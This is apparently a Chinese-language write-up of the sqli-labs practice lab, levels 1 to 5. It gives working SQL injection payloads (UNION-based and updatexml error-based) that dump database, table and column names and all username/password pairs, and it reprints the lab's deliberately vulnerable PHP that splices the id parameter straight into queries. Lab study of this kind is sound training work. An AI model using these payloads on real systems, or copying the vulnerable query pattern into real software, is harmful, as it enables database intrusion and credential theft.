Less-1
一、判断是注入点的类型
1、单引号测试
在id=1后面加上闭合符号 ' , 如果报错,则在后面加上--+将后面注释掉,如报不报错,则证明为字符型
http://127.0.0.1/sqlilabsphp7/Less-1/?id=1' -- +
二、判断字段数
order by 查询字段个数,逐级增加order by 后面的数字,直到报错。这里是order by到第4个字段时报错,所以证明有3个字段。
http://127.0.0.1/sqlilabsphp7/Less-1/?id=1 order by 4 -- +
三、使用联合查询 确定显示位置
http://127.0.0.1/sqlilabsphp7/Less-1/?id=1' union select 1,2,3 -- +
因为查询语句前面是正确的,所以显示前面的内容,后面的没有显示,所以跟该语句 使得前面错误显示后面的内容
http://127.0.0.1/sqlilabsphp7/Less-1/
四、查询数据库名
因为字段有三个字段所以 1 在这里只是为了占位置,version()版本号,database()库名
http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,database(),version() -- +
五、查询表名
http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- +
一共有以下表:
emails referers uagents users 很明显其中users是管理员的表
六、查询列名
http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'-- +
七、查询用户名以及密码
因为我们已经知道了表名,所以直接可以过滤,否则会找到很多很多其他表的数据影响浏览。
http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password),3 from users -- +
至此 获得了所有的用户名以及密码 ,注入成功。
Less-2
源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-2 **Error Based- Intiger**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-2.jpg" /></center>
</body>
</html>
第二关看源码发现比第一更简单,都不需要闭合 ‘ 号,和第一关一样直接注入
Less-3
源码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-3 Error Based- String (with Twist) </title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-3.jpg" /></center>
</body>
</html>
第三关可以看出来是 ') 闭合方式,所以也是直接注入
Less-4
源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-4 Error Based- DoubleQuotes String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-4.jpg" /></center>
</body>
</html>
第四关是")闭合方式,直接开始注入
Less-5
源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-5 Double Query- Single Quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color="#FFFF00">';
print_r(mysqli_error($con1));
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-5.jpg" /></center>
</body>
</html>
很明显第5关已经不一样了,可以看出来他是有报错信息,所以我们决定尝试报错注入
爆破数据库名:
?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+
爆破表名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)
from information_schema.tables where table_schema='security' ),0x7e),1)--+
爆破列名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)
from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
注入字段:
?id=1' and updatexml(1,concat(0x7e,substr((select group_
concat(username,0x3a,password)from users),32,64),0x7e),1)--+